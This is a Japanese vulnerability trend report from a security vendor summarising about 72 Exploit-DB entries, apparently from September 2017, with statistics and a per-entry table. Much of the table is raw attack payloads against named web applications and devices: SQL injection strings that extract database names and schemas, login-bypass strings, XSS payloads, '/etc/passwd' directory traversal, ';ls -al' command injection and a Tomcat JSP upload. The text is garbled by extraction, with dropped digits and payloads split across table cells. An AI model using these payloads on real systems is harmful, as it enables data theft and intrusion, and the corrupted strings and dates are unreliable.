207.09
サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (207.09) 207.09.0~207.09.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 207 年 9 月に公開された Exploit-DB の脆弱性報告件数は 総 72 件であり その中で SQL インジェクションが 62 件で最も多い件数で発見されました 9 月に公開された SQL インジェクション脆弱性は 攻撃を実行し易い方だと分類されました 何故なら この攻撃はオンライン検索を通じてダウンロードできる 攻撃ツールの使い方さえ知れば 誰にでも手軽に悪用できるからです ですが このような易い攻撃難易度持つ同時に SQL インジェクションはその危険度が高すぎて 早急に対応が必要である攻撃に分類されました 幸いに 大部の SQL インジェクション攻撃は Web アプリケーションファイアウォール通じて容易に対応できます よって 持続的なセキュリティを維持するためには Web アプリケーションファイアウォールとセキュアコディングを活用した 多層防御を具現しなければなりません. 脆弱性別件数 脆弱性カテゴリ 件数 ファイルアップロード (File Upload) コマンドインジェクション (Command Injection) 2 クロスサイトスクリプティング (Cross Site Scripting:XSS) 2 ディレクトリトラバーサル (Directory Traversal) 5 SQLインジェクション (SQL Injection) 62 合計 72 80 60 40 20 0 脆弱性別件数 2 2 5 62 2. 危険度別件数 危険度 件数 割合 早急対応要 64 88.89% 高 5 6.94% 中 3 4.7% 合計 72 00.00% 危険度別件数 5 3 3. 攻撃実行の難易度別件数 難易度 件数 割合 難 2 2.78% 中 29 40.28% 易 4 56.94% 合計 72 00.00% 4. 主なソフトウェア別脆弱性発生件数 ソフトウェア名 件数 Joomla 2 A2billing 2 PHP Dashboards 2 Wordpress ICHotelReservation IC-T-Shirt igreeting Cards PTC KSV Script Wireless Repeater ICProjectBidding The Car Project ICClassifieds Ultimate HR System Carlo Gavazzi Powersoft Cory Support PTCEvolution Pay Banner Text Link Ad ICEstate Online Invoice System ICGrocery EzInvoice ICSurvey EzBan CodeMeter My Builder Marketplace ICLowBidAuction Law Firm ICAffiliateTracking Restaurant Website Script Enterprise Edition Payment Processor Script Professional Service Booking Apache Tomcat Online Print Business ICHelpDesk Just Dial Marketplace ICDental Clinic Job Board Software ICCallLimousine Babysitter Website Script ICProductConfigurator Escort Marketplace ICJewelry JobStar Monster Clone Script ICStudents ICAutosales ICTraveling ICDutchAuction ICDoctor Appointment ICRestaurant software AirStar Airbnb Clone Script ICAuction EduStar Udemy Clone Script ICMLM itech StockPhoto Script Carel PlantVisor itech Book Store Script Indusoft Web Studio inclick Cloud Server Theater Management Script Gr8 Multiple Search Engine Script Adserver Script FoodStar Justdial Clone Script osticket Contact Manager XYZ Auto Classifieds NETGEAR ReadyNAS Surveillance Consumer Review Script ICSiteBuilder 合計 72 64 攻撃実行の難易度別件数 2 29 4 主なソフトウェア別脆弱性発生件数 2 2 2 早急対応要 高 中 難中易 Joomla A2billing PHP Dashboards Wordpress ICHotelReservation IC-T-Shirt igreeting Cards PTC KSV Script Wireless Repeater ICProjectBidding The Car Project ICClassifieds Ultimate HR System
最新脆弱性トレンドレポート (207.09) 207.09.0~207.09.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です POST http://localhost/?page_id= HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/6.0.92.75 207-09-0 4268 XSS 易早急対応要 WordPress Plugin Participants Database <.7.5.0 - XSS 脆弱性 Wordpress WordPress Plugin Participants Database <.7.5.0 first_name=<script>alert("");</script>&last_name=a&emai l=a@a.com /ourproducts/checklist/checklist/tag/social'and+(select++from 207-09-03 42607 SQL Injection 高早急対応要 Joomla! Component CheckList..0 +(SeLeCT+count(*),COncaT((SeLeCT(SeLeCT+COncaT(cast( database()+as+char),0x7e))+from+information_schema.tabl es+where+table_schema=database()+limit+0,),floor(rand(0 )*2))x+FrOM+information_schema.tables+group+by+x)a)+A ND+''='.html Joomla Joomla! Component CheckList..0 207-09-03 42606 SQL Injection 易早急対応要 Joomla! Component Survey Force Deluxe 3.2.4 - 'invite' Parameter SQL Injection 脆弱性 /index.php?option=com_surveyforce&task=start_invited&surv ey=9&invite=%20and%20=-- Joomla Joomla! Component Survey Force Deluxe 3.2.4 POST /cgi-bin/webupg HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/6.0.92.75 207-09-04 42608 Command Injection 高早急対応要 Wireless Repeater BE26 - Remote Code Execution 脆弱性 Wireless Repeater Wireless Repeater BE26 name=http&url=http://www.test.com&user=;ls -al >/var/mycode;&password=a&port=8&dir=a POST /actions/changeconfiguration.html HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/6.0.92.75 207-09-04 4260 XSS 高高 CodeMeter 6.50 - XSS 脆弱性 CodeMeter CodeMeter 6.50 Action=CertifiedTimeConfiguration&TimeServerList=cmtime.c odemeter.com%7ccmtime.codemeter.de%7ccmtime.codeme ter.us%7ccmtime.codehacker.de/>"<img src="evil.source" onload=alert("gutenmorgen")>%7c 207-09-04 4267 SQL Injection 高早急対応要 igreeting Cards.0 /index.php?index&search&k=efe'+/*!2union*/(/*! 2SelEcT*/+0x28329,VERSioN(),0x283329,0x283429,0x2835 29,0x283629,0x283729,0x283829)--+iGreeting Cards igreeting Cards.0 POST /a2billing/agent/public/checkout_process.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/6.0.92.75 207-09-04 4266 SQL Injection 難早急対応要 A2billing 2.x A2billing A2billing 2.x transactionid=456789 unise//**lecton selinse//**rtect,2,3,4,0x706c75676e70679,0x3c3f70687020657666c2862 6736536345f6465636f646528245f504f53545b6e6696c6974 5d29293b203f3e,7,8,9,0,,2,3-//**- - &sess_id=448&key=98346a2b29c3c78dc89b5089476eb /info.php?car_id=- 5+/*!22uNiOn*/(/*!22sELect*/0x28329,0x283229,/*!22CONCAT_WS*/(0x203a20,/*!22USER*/(),/*!22 DATABASE*/(),VERSION()),0x283429,0x283529,0x283629,0x 283729,0x283829,0x283929,0x2833029,0x283329,0x283 207-09-05 4269 SQL Injection 易早急対応要 The Car Project.0 3229,0x2833329,0x2833429,0x2833529,0x2833629,0x28 33729,0x2833829,0x2833929,0x28323029,0x2832329,0x 28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333 29,0x28333229,0x28333329,0x28333429,0x28333529,0x2833 3629,0x28333729,0x28333829,0x28333929,0x28343029,0x28 34329,0x28343229,0x28343329,(44),0x28343529,0x283436 29,0x28343729,0x28343829,0x28343929) The Car Project The Car Project.0 POST /a2billing/agent/public/checkout_process.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/6.0.92.75 207-09-05 4265 SQL Injection 高早急対応要 A2billing 2.x A2billing A2billing 2.x transactionid=%20and%20=-- &sess_id=448key=636902c6ed0db5780eb63d26e95268 207-09-05 42628 Directory Traversal 易高 Ultimate HR System <=.2 /download?type=document&filename=../../../../../etc/passwd Ultimate HR System Ultimate HR System <=.2 207-09-06 42620 SQL Injection 易早急対応要 Cory Support - 'pr' Parameter SQL Injection 脆弱性 /listfaq.php?pr=9999+and+=2+union+all+select+null,versio n()-- Cory Support Cory Support 207-09-06 42623 SQL Injection 易早急対応要 Pay Banner Text Link Ad.0.6. /index.php?action=stats&id=%20and%20=-- Pay Banner Text Link Ad Pay Banner Text Link Ad.0.6. /editclient.php?cid=- 5+/*!00003uNiOn*/(/*!00003SelECt*/+0x28329,/*!50000C ONCAT_WS*/(0x203a20,USER()),/*!50000CONCAT_WS*/(0x 203a20,DATABASE()),/*!50000CONCAT_WS*/(0x203a20,VER SION()),0x283529,(/*!50000SelECt*/+export_set(5,@:=0,(S 207-09-07 42629 SQL Injection 高早急対応要 Online Invoice System 3.0 elect+count(*)from(information_schema.columns)where@: =export_set(5,export_set(5,@,table_name,0x3c6c693e,2),col umn_name,0xa3a,2)),@,2)),0x283729,0x283829,0x283929,0 x2833029,0x283329,0x2833229,0x2833329,0x283342 9,0x2833529,0x2833629,0x2833729,0x2833829,0x2833 929,0x28323029,0x2832329,0x28323229,0x28323329,0x283 23429,0x28323529,0x28323629)--+- Online Invoice System Online Invoice System 3.0 /editclient.php?id=- 00+/*!22UniOn*/+/*!22SeleCt*/+0x28329,/*!2 2CONCAT_WS*/(0x203a20,/*!22USER*/(),/*!22DATA 207-09-07 42632 SQL Injection 高早急対応要 EzInvoice 6.02 BASE*/(),VERSION()),0x283329,/*!22CONCAT_WS*/(0x2 03a20,/*!22USER*/(),/*!22DATABASE*/(),VERSION() ),/*!22CONCAT_WS*/(0x203a20,/*!22USER*/(),/*! 22DATABASE*/(),VERSION()),/*!22CONCAT_WS*/(0x20 3a20,/*!22USER*/(),/*!22DATABASE*/(),VERSION()) --+- EzInvoice EzInvoice 6.02
最新脆弱性トレンドレポート (207.09) 207.09.0~207.09.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です /ezban.php?id=00++and(/*!00002select*/+0x3078333+/ *!00002frOM*/+(/*!00002SelEcT*/+cOUNT(*),/*!00002cOnC at*/((/*!00002select*/(/*!00002select*/+/*!00002conca 207-09-07 4263 SQL Injection 高早急対応要 EzBan 5.3 - 'id' Parameter SQL Injection 脆弱性 T*/(cAST(dATABASE()+aS+/*!00002cHAR*/),0x7e,0x496873 66E53656e6366e))+/*!00002FRoM*/+iNFORMATION_sCHE MA.tABLES+/*!00002wHERE*/+tABLE_sCHEMA=dATABASE() +limit+0,),floor(/*!00002rand*/(0)*2))x+/*!00002from */+information_schema.tables+group+by+x)a)+/*!000 02aNd*/+=&action=show EzBan EzBan 5.3 207-09-09 42645 SQL Injection 易早急対応要 My Builder Marketplace.0 /marketplace?start_date=%20and%20=-- My Builder Marketplace My Builder Marketplace.0 207-09-09 42643 SQL Injection 易早急対応要 Law Firm.0 /business-searchlist?country=%20and%20=-- &state=%20and%20=--&city=%20and%20=-- &farm_cat=%20and%20=-- Law Firm Law Firm.0 /cms.php?id=- 6'++/*!00002UNION*/+/*!00002SELECT*/+0x3,0x32,0x33, 207-09-09 42642 SQL Injection 易早急対応要 Restaurant Website Script.0 (Select+export_set(5,@:=0,(select+count(*)from(informatio n_schema.columns)where@:=export_set(5,export_set(5,@,t able_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x 35,0x36,0x37,0x38,0x39,0x330,0x33,0x332,0x333,0x3 34,0x335,0x336,0x337,0x338,9,20,0x323,0x3232--+- Restaurant Website Script Restaurant Website Script.0 /content.php?page=- 7+/*!50000UniOn*/+/*!50000SelECt*/+0x49687366e20536 207-09-09 4264 SQL Injection 高早急対応要 Professional Service Booking.0 56e6366e,(Select+export_set(5,@:=0,(select+count(*)from (information_schema.columns)where@:=export_set(5,export _set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))-- Professional Service Booking Professional Service Booking.0 /product-decs.php?cat_id=- 49++/*!50000UNION*/(/*!50000SELECT*/+0x28329,0x28 3229,0x283329,0x283429,0x283529,0x283629,0x283729,0x2 83829,0x283929,0x2833029,0x283329,0x2833229,0x283 207-09-09 42640 SQL Injection 高早急対応要 Online Print Business.0 3329,0x2833429,0x2833529,0x2833629,0x2833729,0x2 833829,0x2833929,0x28323029,0x2832329,0x28323229, 0x28323329,0x28323429,0x28323529,(Select+export_set(5, @:=0,(select+count(*)from(information_schema.columns)wh ere@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x28323729,0x28323829, 0x28323929)-- Online Print Business Online Print Business.0 207-09-09 42639 SQL Injection 高早急対応要 Just Dial Marketplace.0 /result/%20and%20=--/efe/ Just Dial Marketplace Just Dial Marketplace.0 /job-details/- 3'+/*!50000UNION*/(/*!50000SELECT*/+0x28329,0x283 229,0x283329,(Select+export_set(5,@:=0,(select+count(*)fr om(information_schema.columns)where@:=export_set(5,exp ort_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a, 207-09-09 42637 SQL Injection 高早急対応要 Job Board Software.0 2)),@,2)),0x283529,0x283629,0x283729,0x283829,0x283929,0x2833029,0x283329,0x2833229,0x2833329,0x28334 29,0x2833529,0x2833629,0x2833729,0x2833829,0x283 3929,0x28323029,0x2832329,0x28323229,0x28323329,0x28 323429,0x28323529,0x28323629,0x28323729,0x28323829,0x 28323929,0x28333029,0x2833329,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x283338 29,0x28333929,0x28343029,0x2834329,0x28343229)--/eFe Job Board Software Job Board Software.0 /taskers?skills=63'and+(/*!44455select*/+0x3+/*!44455fr OM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*! 44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(d 207-09-09 42636 SQL Injection 高早急対応要 Babysitter Website Script.0 ATABASE()+As+char),0x7e,0x49687366E53656e6366e))+/ *!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE */+table_schema=database()+limit+0,),floor(rand(0)*2)) x+/*!44455from*/+information_schema.tables+/*!44455g ROUP*/+bY+x)a)+aND+==' Babysitter Website Script Babysitter Website Script.0 /prof_detils.html?escort=- 48820035'+/*!2UnIoN*/+(/*!2SelEcT*/0x28329,0x283229,0x283329,0x283429,(Select+export_set(5,@:=0,( 207-09-09 42635 SQL Injection 高早急対応要 Escort Marketplace.0 /*!2SelEcT*/+count(*)from(information_schema.column s)where@:=export_set(5,export_set(5,@,table_name,0x3c6c 693e,2),column_name,0xa3a,2)),@,2)),0x283629,0x283729, 0x283829,0x283929,0x2833029,0x283329,0x2833229,0x 2833329,0x2833429,0x2833529,0x2833629)-- Escort Marketplace Escort Marketplace.0 207-09- 42655 SQL Injection 易早急対応要 JobStar Monster Clone Script.0 /jobdetailshow?id=%20and%20=-- JobStar Monster Clone Script JobStar Monster Clone Script.0 207-09- 42654 SQL Injection 易早急対応要 PHP Dashboards NEW 4.4 /php/share/save.php?dashid=%20and%20=-- PHP Dashboards PHP Dashboards NEW 4.4 207-09- 42653 Directory Traversal 易高 PHP Dashboards NEW 4.4 /php/file/read.php?filename=../../../etc/passwd PHP Dashboards PHP Dashboards NEW 4.4 207-09- 42659 SQL Injection 高早急対応要 AirStar Airbnb Clone Script.0 /airstar/hotel/roomsedit/detailedroom/6 AND 8995=8995?mem_count=&check_in=&check_out=&search_ city=madurai,india&min_amt=0&max_amt=50&inout=0 AirStar Airbnb Clone Script AirStar Airbnb Clone Script.0 207-09- 42658 SQL Injection 易早急対応要 EduStar Udemy Clone Script.0 /courses/details?course_id=05 and = EduStar Udemy Clone Script EduStar Udemy Clone Script.0 POST / HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/6.0.92.75 207-09- 42657 SQL Injection 易早急対応要 itech StockPhoto Script 2.02 itech StockPhoto Script itech StockPhoto Script 2.02 stock=9 AND 977=977 207-09- 42656 SQL Injection 易早急対応要 itech Book Store Script 2.02 /book_details.php?id=id=2 AND SLEEP(5)-- itech Book Store Script itech Book Store Script 2.02 /client.php?pageid=sites&subpid=modify&site_id=- ++/*!00008UniOn*/+/*!00008sEleCT*/+0x28329,0x28322 207-09-2 42663 SQL Injection 高早急対応要 inclick Cloud Server 5.0 9,0x283329,0x283429,(Select+export_set(5,@:=0,(select+co unt(*)from(information_schema.columns)where@:=export_s et(5,export_set(5,@,table_name,0x3c6c693e,2),column_nam e,0xa3a,2)),@,2)),0x283629,0x283729,0x283829,0x283929,0 x2833029,0x283329-- inclick Cloud Server inclick Cloud Server 5.0 207-09-2 42662 SQL Injection 高早急対応要 Gr8 Multiple Search Engine Script.0 /%20and%20=--/X.html Gr8 Multiple Search Engine Script Gr8 Multiple Search Engine Script.0 207-09-2 4266 SQL Injection 易早急対応要 FoodStar.0 /public/frontend/search?keyword=%20and%20=-- FoodStar FoodStar.0 207-09-2 42660 SQL Injection 難早急対応要 osticket.0 /file.php?key[id` = UNION SELECT,2,3-- ]=&signature=&expires=5047253 osticket osticket.0 207-09-2 42727 SQL Injection 高早急対応要 XYZ Auto Classifieds.0 /xyz-auto-classifieds/item/view/3 and sleep(5) XYZ Auto Classifieds XYZ Auto Classifieds.0 207-09-2 42728 SQL Injection 易早急対応要 Consumer Review Script.0 /review-details.php?idvalue=9 and sleep(5) Consumer Review Script Consumer Review Script.0 207-09-3 42689 SQL Injection 易早急対応要 ICSiteBuilder. /index.php?page=news&nid=%20and%20=-- ICSiteBuilder ICSiteBuilder.
最新脆弱性トレンドレポート (207.09) 207.09.0~207.09.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 207-09-3 42688 SQL Injection 易 早急対応要 207-09-3 42687 SQL Injection 易 早急対応要 207-09-3 42686 SQL Injection 易 早急対応要 207-09-3 42685 SQL Injection 易 早急対応要 207-09-3 42684 SQL Injection 易 早急対応要 207-09-3 42682 SQL Injection 易 早急対応要 ICHelpDesk. - 'pk' Parameter SQL Injection 脆弱性 ICEstate. - 'id' Parameter SQL Injection 脆弱性 ICDental Clinic.2 ICProjectBidding. ICCallLimousine. ICGrocery. /index.php?page=static_pages&pk=%20and%20=-- ICHelpDesk ICHelpDesk. /details.aspx?id=%20and%20=-- ICEstate ICEstate. /index.php?page=static_pages&key=%20and%20=-- ICDental Clinic ICDental Clinic.2 /admin/editadminuser.php?id=%20and%20=-- ICProjectBidding ICProjectBidding. /index.php?page=static_pages&key=%20and%20=-- ICCallLimousine ICCallLimousine. /index.php?page=static_pages&key=%20and%20=-- ICGrocery ICGrocery. 207-09-3 4268 SQL Injection 易早急対応要 ICProductConfigurator. - 'key' Parameter SQL Injection /index.php?page=static_pages&key=%20and%20=-- ICProductConfigurator ICProductConfigurator. 207-09-3 42680 SQL Injection 易早急対応要 207-09-3 42679 SQL Injection 易早急対応要 207-09-3 42678 SQL Injection 易早急対応要 IC-T-Shirt.2 ICJewelry. ICSurvey. /index.php?page=static_pages&key=%20and%20=-- IC-T-Shirt IC-T-Shirt.2 /index.php?page=static_pages&key=%20and%20=-- ICJewelry ICJewelry. /survey.php?page=preview&test=%20and%20=-- ICSurvey ICSurvey. /index.php?page=static_page&key=- EfE'+/*!00009UniOn*/+/*!00009SelEcT*/+0x3,0x32,0x3c68 207-09-3 42677 SQL Injection 高早急対応要 ICStudents.2 33e49485344e2053454e4344e3c2f6833e,(/*!00009Selec t*/+export_set(5,@:=0,(/*!00009select*/+count(*)from(info rmation_schema.columns)where@:=export_set(5,export_set( 5,@,/*!00009table_name*/,0x3c6c693e,2),/*!00009column_ name*/,0xa3a,2)),@,2))-- ICStudents ICStudents.2 /post_details.php?city=0&id=- 306'++/*!00004UNION*/+/*!00004SELECT*/+0x3,0x32,0 x33,0x34,0x35,0x36,(/*!00004select*/+export_set(5,@:=0,( 207-09-3 42676 SQL Injection 高早急対応要 ICClassifieds. /*!00004select*/+count(*)from(information_schema.columns )where@:=export_set(5,export_set(5,@,/*!00004table_name */,0x3c6c693e,2),/*!00004column_name*/,0xa3a,2)),@,2)), 0x49687366e2053656e6366e,0x39,0x330,0x33,0x332, 0x333,0x334,0x335,0x336,0x337-- ICClassifieds ICClassifieds. POST /admin HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/6.0.92.75 207-09-3 42675 SQL Injection 易早急対応要 ICTraveling 2.2 ICTraveling ICTraveling 2.2 user='or = or ''='&pass='anything' 207-09-3 42674 SQL Injection 易早急対応要 ICAutosales 2.2 /index.php?cmd=advertise_details&category=car&aid=%20a nd%20=-- ICAutosales ICAutosales 2.2 207-09-3 42673 SQL Injection 易早急対応要 ICDutchAuction.2 /admin/viewuserips.php?id=%20and%20=-- ICDutchAuction ICDutchAuction.2 207-09-3 42672 SQL Injection 易早急対応要 ICRestaurant software.4 /index.php?page=static_pages&key=%20and%20=-- ICRestaurant software ICRestaurant software.4 207-09-3 4267 SQL Injection 易早急対応要 ICDoctor Appointment.3 /index.php?page=static_pages&key=%20and%20=-- ICDoctor Appointment ICDoctor Appointment.3 207-09-3 42670 SQL Injection 易早急対応要 207-09-3 42669 SQL Injection 易早急対応要 ICAuction 2.2 - 'id' Parameter SQL Injection 脆弱性 ICHotelReservation 3.3 /item.php?id=%20and%20=-- ICAuction ICAuction 2.2 /index.php?page=static_pages&key=%20and%20=-- ICHotelReservation ICHotelReservation 3.3 /index.php?page=static_pages&key='+/*!00007union*/+/*! 00007SelEct*/+0x28329,0x283229,0x3c6833e49687366e 207-09-3 42668 SQL Injection 高早急対応要 ICMLM 2. 2053656e6366e3c2f6833e,(/*!50000Select*/+export_set(5,@:=0,(/*!50000select*/+count(*)from(information_schema. columns)where@:=export_set(5,export_set(5,@,/*!50000tab le_name*/,0x3c6c693e,2),/*!50000column_name*/,0xa3a,2) ),@,2))-- ICMLM ICMLM 2. 207-09-3 42667 SQL Injection 易早急対応要 207-09-3 42706 Directory Traversal 高中 ICLowBidAuction 3.3 Carel PlantVisor 2.4.4 /admin/editadminuser.php?id=%20and%20=-- ICLowBidAuction ICLowBidAuction 3.3 /..%5c/..%5c/..%5c/..%5c/..%5c/..%5ctest.txt Carel PlantVisor Carel PlantVisor 2.4.4 207-09-3 42705 Directory Traversal 易中 Carlo Gavazzi Powersoft 2... /../../../../../../../../../../../text.txt?res=&valid=true Carlo Gavazzi Powersoft Carlo Gavazzi Powersoft 2... 207-09-3 42699 Directory Traversal 易中 Indusoft Web Studio /../../../../../../../../../../../text.txt Indusoft Web Studio Indusoft Web Studio POST /icaffiliatetracking/adminlogin.asp HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/6.0.92.75 207-09-3 42690 SQL Injection 易早急対応要 ICAffiliateTracking. ICAffiliateTracking ICAffiliateTracking. user='or = or ''='&pass='anything' /show-time.php?moid=- 00'++/*!08888UNION*/(/*!08888SELECT*/0x28329,0x283 229,0x283329,0x283429,0x283529,0x283629,0x283729,0x28 3829,0x283929,0x2833029,0x283329,(/*!08888Select*/+ 207-09-4 4276 SQL Injection 高早急対応要 Theater Management Script export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from */(information_schema.columns)where@:=export_set(5,expo rt_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888co lumn_name*/,0xa3a,2)),@,2)),0x2833329,0x2833429,0x2 833529,0x2833629,0x2833729,0x2833829,0x2833929, 0x28323029,0x2832329,0x28323229,0x28323329)-- Theater Management Script Theater Management Script /gpt.php?v=entry&type=+'++and(/*!00000select*/+0x307 8333+/*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!0 0000CoNCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dA 207-09-4 4275 SQL Injection 高早急対応要 PTC KSV Script.7 - 'type' Parameter SQL Injection 脆弱性 TABASE()+aS+cHAR),0x7e,0x49687366E53656e6366e))+f ROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEM A=dATABASE()+lIMIT+0,),fLOOR(rAND(0)*2))x+fROM+iNF ORMATION_sCHEMA.tABLES+gROUP+bY+x)a) AND ''='&id=& PTC KSV Script PTC KSV Script.7 /manage-target.php?id=3-207-09-4 4274 SQL Injection 高早急対応要 Adserver Script 5.6 3'+/*!00008union*/+/*!00008select*/++/*!00008CONCAT_ WS*/(0x203a20,USER(),DATABASE(),VERSION())--+- &wap=0 Adserver Script Adserver Script 5.6 /products?id=- ++/*!00002UNION*/(/*!00002SELECT*/+0x28329,0x2832 207-09-4 4273 SQL Injection 高早急対応要 Enterprise Edition Payment Processor Script 3.7 29,0x283329,0x283429,0x283529,0x283629,0x283729,0x283 829,0x283929,0x2833029,0x283329,0x2833229,0x2833 329,0x2833429,0x2833529,0x2833629,/*!00002CONCAT_ WS*/(0x203a20,USER(),DATABASE(),VERSION()))--+- &action=update Enterprise Edition Payment Processor Script Enterprise Edition Payment Processor Script 3.7
最新脆弱性トレンドレポート (207.09) 207.09.0~207.09.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です /restaurantsdetails.php?fid=46'++and(/*!00000select*/+0x3078333+ /*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!00000Co 207-09-4 4277 SQL Injection 高早急対応要 Justdial Clone Script - 'fid' Parameter SQL Injection 脆弱性 NCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dATABASE ()+as+char),0x7e,0x49687366e53656e6366e))+from+in FORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATA BASE()+lIMIT+0,),fLOOR(rAND(0)*2))x+fROM+iNFORMATI ON_sCHEMA.tABLES+gROUP+bY+x)a) AND ''=' Justdial Clone Script Justdial Clone Script /index.php?view=products&id=- 4++/*!03333UNION*/(/*!03333SELECT*/+(),(/*!03333Sele 207-09-5 42733 SQL Injection 高早急対応要 PTCEvolution 5.50 ct*/+export_set(5,@:=0,(/*!03333select*/+count(*)/*!0333 3from*/(information_schema.columns)where@:=export_set( 5,export_set(5,@,/*!03333table_name*/,0x3c6c693e,2),/*!0 3333column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8), (9))-- PTCEvolution PTCEvolution 5.50 207-09-5 42734 SQL Injection 易早急対応要 Contact Manager.0 - 'femail' Parameter SQL Injection 脆弱性 /login.php?forgot=2&femail=%20and%20=-- Contact Manager Contact Manager.0 PUT /.jsp/ HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/6.0.92.75 207-09-20 42953 File Upload 易高 Apache Tomcat < 9.0. (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - File Upload 脆弱性 Content-Length: 26 Apache Tomcat Apache Tomcat < 9.0. (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 <% out.println("hello");%> 207-09-27 42956 Command Injection 易早急対応要 NETGEAR ReadyNAS Surveillance.4.3-6 - Command Injection 脆弱性 /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;ls -al%205;%27 NETGEAR ReadyNAS Surveillance NETGEAR ReadyNAS Surveillance.4.3-6